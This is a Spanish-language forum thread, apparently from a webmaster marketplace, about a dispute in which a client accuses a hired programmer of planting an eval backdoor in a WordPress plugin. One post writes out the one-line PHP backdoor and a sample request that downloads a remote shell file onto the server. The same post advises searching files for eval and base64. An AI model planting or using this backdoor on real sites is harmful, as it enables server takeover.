el eval permite evaluar codigo PHP y ejecutarlo en el servidor...
si yo coloco eso en cualquier archivo PHP del servidor, puedo inyectarle cualquier codigo PHP que quiera y este se ejecutara en el servidor... ejemlo puedo hacer que lea un archivo remoto y lo cree en el servidor... ejemplo:PHP:<? eval($_GET['e']); ?>
y eso lo que hace es crear un archivo virus.php en el servidor infectado con el contenido de 404 Not Found y de esa forma basicamente estaria dentro del servidor con una shell o lo que sea... en mi ejemplo puse phpinfo(); (para que se ejecute) y esa funcion lo que hace es mostrarme la informacion de PHP...PHP:www.sitio.com/archivoinfectado.php?e=file_put_contents('virus.php',file_get_contents('http://www.otrositio.com/shell.txt'));
El eval sin controlar es un peligro... es mas en muchos de los post por los cuales he participado por sitios hackeados/infectados les digo lo mismo, que busquen dentro de los archivos la cadena: eval, base64, etc... los cuales son comunes cuando infectan sitios...
No solo le infectaron el sitio lo mas seguro es que su sitio este siendo usado para redirecciones de otro sitio hackeado, como el caso del sitio a donde redireccionaba el sitio de tnc...
Bueno, yo previamente le hice unas reparaciones al mismo script (creo, es un crawler de videos xxx, un plugin que el desarrollador ya no da soporte), hace poco tiempo (o no tan poco, tengo que revisar la fecha), y puedo corroborar que en ese entonces el código eval en el archivo 404 no estaba, y no había forma de ejecutar código arbitrariamente. Lamentablemente no nos calificamos por ese negocio, todo bien pero lo hicimos por skype y creo que una regla dice que si el negocio es por skype no se puede calificar ni quejarse asique ni me gasto.
Pero, solo en el caso de que lo tomaran como valido, es un plugin sin mantenimiento, sin actualizaciones y el wp no se toca salvo que se rompa, por lo que tengo entendido. No puedo asegurar que tnc haya hecho alguna otra cosa mientras tanto, pero puedo decir que quien haya puesto esos eval lo hizo en este ultimo tiempo.
SI muestran los logs del ftp seguro se aclara. No entiendo por qué hicieron eso, pero tnc siempre fue un buen cliente, no se si realmente fue kanikase, solo se que, usar un eval para mover las K de visitas o joderle el sitio a tnc es realmente fácil (aclaro no digo que sea kanikase).
Igual recapitulando, el programador se retrasa de entrada (con sus razones), tincho lo acepta, cierran el negocio por la mitad. Después da justo con un hackeo...
Ahora, no entiendo, por qué si tnc sospecha, (y con justas razones) y no está satisfecho con el negocio no puede calificarlo de forma negativa, digo, si no le gusta su forma de trabajar y además de eso está convencido de que lo hackeó, por qué no le puede poner una negativa?...
Además para trabajar kanikase necesita el ftp, en general son los mismos datos de acceso a un panel, donde fácilmente se pueden resetear los logs.
Personalmente me resulta muy dudoso, tengas las calificaciones que tengas, acá el que más pierde es tnc, el programador por más que tenga justas razones, desde el minuto 0 que fue irresponsable. Aunque el cliente lo haya aceptado, después lo del hackeo... Y te dedicaste todo el post a decir "yo no fui, demostrá lo contrario" que desde dos puntos de vista puede ser, o estás segurisimo de que borraste todo los logs, o no fuiste vos.
Aún así es el riezgo de tener los datos del sitio, yo de entrada como programador cuando me dicen "me infectaste el sitio" en vez de decirle "como?", le digo, disculpame pero no es posible, me dediqué a hacer mi trabajo, pero desde ya mismo te ofrezco toda mi ayuda y conocimientos como programador para solucionar el problema. porque yo acepté los datos de tu ftp y me hice responsable de tu sitio desde que empecé a trabajar.
para terminar mi análisis y tratando de ser imparcial, critico de tnc la falta de revisión, a la hora de dar datos así como así, tardar en comprobar todo, agregando la mala comunicación por skype a la hora de decir "ok. chau" en vez de explicar todo o exigir la reparación de los daños causados en vez de meter negativa de una. Comprendo que creas que fué él, y yo también lo creería en vista de la situación expuesta en el post, pero dejaría un margen a un error de parte del programador, o algo por el estilo.
Aún así, completamente a favor de tnc porque se nota una presión sobre el post, y cosas poco habituales en la sección de aclaraciones.